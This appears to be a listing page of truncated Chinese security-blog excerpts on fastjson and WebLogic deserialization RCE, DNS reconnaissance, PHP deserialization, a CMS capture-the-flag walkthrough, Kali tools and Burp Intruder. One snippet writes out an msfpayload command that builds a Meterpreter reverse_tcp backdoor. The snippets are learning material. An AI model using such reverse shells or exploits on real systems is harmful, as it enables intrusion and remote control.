本文原创地址:https://www.cnblogs.com/yunmuq/p/14268028.html 一.背景 fastjsion是阿里的开源Java工具:https://github.com/alibaba/fastjson 能快速地将对象序列化为json字符串,或进行反序列化 其速度和效率在同类型工具中遥遥领先,但曾被曝出存在高危漏洞 漏洞主要分布于1.2.68及以下的版本中,在将json反序列化为对象时,存在代码执行漏洞 如果一些项目未更新到最新版本,则存在安全漏洞 二.Payloa…

weblogic WLS 反序列化漏洞学习 鸣谢 感谢POC和分析文档的作者-绿盟大佬=>liaoxinxi:感谢群内各位大佬及时传播了分析文档,我才有幸能看到. 漏洞简介 漏洞威胁:RCE--远程代码执行 漏洞组件:weblogic 影响版本:10.3.6.0.12.1.3.0.12.2.1.2.12.2.1.3 温馨提示:对于攻击者自己构造的新的payload,还没有被oracle加入黑名单,所以还是多加留心.持续监控的好. 漏洞复现 我保存了python漏扫脚本,重命名为weblogic2…

信息收集: dns信息收集 格式:dns... -参数 域名 -参数 示例: root@xxSec:~# dnsenum baidu.com root@xxSec:~# dnsenum -f dns.txt dnsserver 8.8.8.8 baidu.com(-f加字典暴力破解 通过代理服务器) root@xxSec:~# dnswalk baidu.com.(检测有问题的dns,域名后面要加.结束) root@xxSec:~# dnstracer -s 8.8.8.8 baidu.com…

x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…

猫宁!!! 参考链接: www.phpinfo.cc/?post=42 https://www.freebuf.com/sectool/149883.html 同事介绍了一款渗透测试框架AngelSword,中文就是天使之剑,看了一下作者,是Lucifer1993,之前用过他的struts 2系列漏洞测试工具,很好用. 这个是工具的github地址: https://github.com/Lucifer1993/AngelSword 目前这个工具已经基本停止维护了,而且作者在readme中也没有…

网站是齐博CMS V7.0    1.要求获得管理员密码:   利用齐博CMS V7.0  SQL爆破注入漏洞即可得到管理员用户名密码    https://www.cnblogs.com/vspiders/p/7399088.html   2.要求获得服务器管理员桌面的flag:   利用齐博CMS V7.0 后台getshell   https://www.uedbox.com/post/41188/      3.bbs.test.ichunqiu数据库中admin的salt值   第 3…

参考文章: PHP反序列化漏洞入门 easy_serialize_php wp 实战经验丨PHP反序列化漏洞总结 PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 利用 phar 拓展 php 反序列化漏洞攻击面 序列化和反序列化的概念 序列化就是将 对象.string.数组array.变量 转换成具有一定格式的字符串. 具体可以看 CTF PHP反序列化,下图摘自此篇文章 其实每个字符对应的含义都很好理解: s ---- string 字符串 i ---- intege…

声明:本文理论大部分是苑房弘kalilinux渗透测试的内容 第五章:基本工具 克隆网页,把gitbook的书记下载到本地 httrack "http://www.mybatis.org/mybatis-3/zh/" -O ./books/mybatis/  -v 十一章:无线渗透 工具: 无线网卡: 其实我的笔记本自带的无线网卡就很好了,完全支持aircrack-ng,因为我是 物理机直接装的kali. 之前尝试过ALFA360NH,信号大大的增强了,但是不支持WPS 破解,可能是我…

声明:本文理论大部分是苑房弘kalilinux渗透测试的内容 第五章:基本工具 克隆网页,把gitbook的书记下载到本地 httrack "http://www.mybatis.org/mybatis-3/zh/" -O ./books/mybatis/ -v 第六章: 信息收集 shodan 官网:https://www.shodan.io/ 视频教程:https://asciinema.org/~Shodan 优质文档:http://b404.xyz/2018/02/08/Sho…

之前章节记到Burp Intruder功能区,接上次笔记 一.首先说再展开说说Brup Intruder功能, 1.标识符枚举Web应用程序经常使用标识符来引用用户账户,资产数据信息. 2.提取有用的数据,不是简单的识别有效标识符,而是通过简单标识符提取其他数据,比方说,通过用户个人空间的ID获取用户关联信息. 3.模糊测试很多输入性的漏洞,譬如说常见的SQL注入,跨站脚本和文件路径便利可以通过请求参数提交各种测试字符串,并分析错误信息和其他异常情况,并对应用程序进行检测,但是手动执行这样的测试…